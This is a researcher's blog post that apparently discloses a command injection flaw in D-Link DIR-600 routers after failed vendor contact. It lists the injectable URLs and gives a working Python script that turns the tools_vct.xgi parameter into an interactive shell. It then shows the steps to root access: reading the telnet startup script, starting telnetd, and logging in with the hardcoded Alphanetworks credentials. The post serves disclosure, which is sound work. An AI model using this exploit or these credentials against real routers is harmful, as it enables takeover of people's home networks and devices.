SPECT Research

Security and Software Development


Home About us Projects Education

D-Link DIR-600 Command Injection Vulnerability

on security, chile

In February I contacted D-Link Chile, then D-Link Latin America but I never received an official answer for my report. After eight months, I will publish the details of this vulnerability (I tried responsible disclosure but D-Link didn't take in account my reports). It's a simple command injection vulnerability that requires administration credentials. For more details you can check my last post about this issue. The hardware version is Bx and the affected firmware
versions are:

  • Version 2.0 (default) (it's vulnerable to HNAP flaw too (tested by me), so I managed to get admin credentials)
  • Version 2.05 (current)

The vulnerable pages are:

  • http://router_ip/tools_vct.xgi?set/runtime/switch/||command||=1
  • http://router_ip/st_log.xgi?set/runtime/syslog/||command||=1
  • http://router_ip/tools_firmware.xgi?set/runtime/sys/check_fw||command||=Bx_Default_FW_0205&date=2011.5.26.2.5.36

The exploit I use, after authentication in web browser, is the following:

#!/usr/bin/env python3
# coding=utf8
# csalazar at spect dot cl

import http.cookiejar
import urllib.request, urllib.error
import sys

if len(sys.argv) != 2:
    print('Usage: python3 %s router_ip' % sys.argv[0])
    sys.exit(0)

url = 'http://'+sys.argv[1]+'/tools_vct.xgi?set/runtime/switch/||%s||=1'
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

while True:
    command = input('$ ')
    try:
        r = opener.open(url % (command))
    except urllib.error.HTTPError as e:
       output = e.info()._payload
       print(output[:-136])

A short video with the exploit in action is here:

Getting root access

Telnet is disabled by default, but it can be enabled. The steps are: first, find user name and password used by telnet service, and then, start telnet daemon.

$ cat /etc/scripts/misc/telnetd.sh
#!/bin/sh
image_sign=`cat /etc/config/image_sign`
TELNETD=`rgdb -g /sys/telnetd`
if [ "$TELNETD" = "true" ]; then
    echo "Start telnetd ..." > /dev/console
    if [ -f "/usr/sbin/login" ]; then
        lf=`rgdb -i -g /runtime/layout/lanif`
        telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
    else
        telnetd &
    fi
fi

$ cat /etc/config/image_sign
wrgn23_dlwbr_dir600b

$ sh /etc/scripts/misc/telnetd.sh

After that, you can access by Telnet with root privileges!

csalazar:~/spect/security/research/dlink$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgn23_dlwbr_dir600b

BusyBox v1.00 (2010.11.23-03:23+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

Fixing the problem

No solution is provided by D-Link. The only solution is to install DD-WRT in this router.